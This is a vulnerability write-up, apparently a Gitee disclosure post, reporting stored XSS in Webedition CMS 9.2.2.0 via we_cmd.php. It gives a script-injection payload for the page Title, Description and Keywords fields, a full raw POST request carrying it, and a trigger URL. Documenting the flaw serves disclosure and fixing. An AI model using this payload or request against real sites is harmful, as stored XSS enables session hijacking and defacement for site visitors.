Webedition CMS 9.2.2.0 has a Stored XSS vulnerability via /webEdition/we_cmd.php

## Install using OnlineInstaller.php 
Download link: https://download.webedition.org/releases/ 
Runtime environment: Nginx + php8.1 
Bind domain name webedition.test 
Access through a web browser.
![输入图片说明](https://foruda.gitee.com/images/1709220553014951515/7be59b6d_5124624.png "屏幕截图")

After installation is complete.
![输入图片说明](https://foruda.gitee.com/images/1709220631671783030/4b6914f7_5124624.png "屏幕截图")
## POC
The steps to reproduce are as follows.
Go to New -> Webedition page -> empty page
![输入图片说明](https://foruda.gitee.com/images/1709221223901253588/33cf6cbb_5124624.png "屏幕截图")
Insert Payload into Title, Description, and Keywords, and save. XSS can be triggered by previewing on the right side.

```
"><script>alert(123)</script>
```
POC is
```
POST /webEdition/we_cmd.php?we_cmd[0]=save_document&we_cmd[1]=6b35402e47882e87393d52aad95d344a&we_cmd[2]=0&we_cmd[3]=1&we_cmd[4]=0&we_cmd[5]=&we_cmd[6]= HTTP/1.1
Host: webedition.test
Content-Length: 1691
Cache-Control: max-age=0
Origin: http://webedition.test
DNT: 1
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Referer: http://webedition.test/webEdition/we_cmd.php?we_cmd[0]=load_editor&we_transaction=6b35402e47882e87393d52aad95d344a&we_complete_request=1
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en-US;q=0.8,en;q=0.7
Cookie: WESESSION=065414a1ad57da84f32469df75aa9add08e00e77; treewidth_main=300; cookie=yep
Connection: close

we_transaction=6b35402e47882e87393d52aad95d344a&we_680c4582c389c87256890621c68ed13d_Filename=xss.php&we_680c4582c389c87256890621c68ed13d_Extension=.php&wetmp_we_680c4582c389c87256890621c68ed13d_Extension=&we_680c4582c389c87256890621c68ed13d_ParentPath=%2F&we_680c4582c389c87256890621c68ed13d_ParentID=0&yuiAcContentTypeParentPath=&we_680c4582c389c87256890621c68ed13d_DocType=&we_680c4582c389c87256890621c68ed13d_TemplateName=%2F&we_680c4582c389c87256890621c68ed13d_TemplateID=&yuiAcContentTypeTemplate=&we_680c4582c389c87256890621c68ed13d_IsDynamic=0&we_680c4582c389c87256890621c68ed13d_IsSearchable=0&we_680c4582c389c87256890621c68ed13d_InGlossar=0&we_680c4582c389c87256890621c68ed13d_txt%5BTitle%5D=%22%3E%3Cscript%3Ealert%28123%29%3C%2Fscript%3E&we_680c4582c389c87256890621c68ed13d_txt%5BDescription%5D=%22%3E%3Cscript%3Ealert%28123%29%3C%2Fscript%3E&we_680c4582c389c87256890621c68ed13d_txt%5BKeywords%5D=%22%3E%3Cscript%3Ealert%28123%29%3C%2Fscript%3E&fold%5B0%5D=0&fold_named%5BPropertyPage_3%5D=0&we_680c4582c389c87256890621c68ed13d_Language=en_GB&we_680c4582c389c87256890621c68ed13d_LanguageDocName%5Bde_DE%5D=&we_680c4582c389c87256890621c68ed13d_LanguageDocID%5Bde_DE%5D=&yuiAcContentTypeLanguageDocdeDE=&we_680c4582c389c87256890621c68ed13d_LanguageDocName%5Ben_GB%5D=&we_680c4582c389c87256890621c68ed13d_LanguageDocID%5Ben_GB%5D=&yuiAcContentTypeLanguageDocenGB=&fold%5B1%5D=0&fold_named%5BPropertyPage_4%5D=0&we_680c4582c389c87256890621c68ed13d_CopyID=0&fold%5B2%5D=0&fold_named%5BPropertyPage_6%5D=0&wetmp_680c4582c389c87256890621c68ed13d_CreatorID=%2Fadmin&we_680c4582c389c87256890621c68ed13d_CreatorID=1&we_680c4582c389c87256890621c68ed13d_RestrictOwners=0&we_complete_request=1
```

![输入图片说明](https://foruda.gitee.com/images/1709221525413505436/cc732c2d_5124624.png "屏幕截图")

as we can see adding a file now

In the right click preview, XSS can be triggered.

![输入图片说明](https://foruda.gitee.com/images/1709221499648060571/393ea3e7_5124624.png "屏幕截图")

Also trigger by accessing `http://webedition.test/webEdition/we_cmd.php?we_cmd[0]=we_base_showTemp&file=temp/tmp//webEdition/we_cmd.php?we_cmd[0]=we_base_showTemp&file=temp/tmp/b80a801e48785da90002028bf0599cd6.php`.

![输入图片说明](https://foruda.gitee.com/images/1709221469696298394/eb06671d_5124624.png "屏幕截图")

小呆/Pwn

内容风险标识

评论 (0)

小呆/Pwn .gitee-modal { width: 500px !important; }

内容风险标识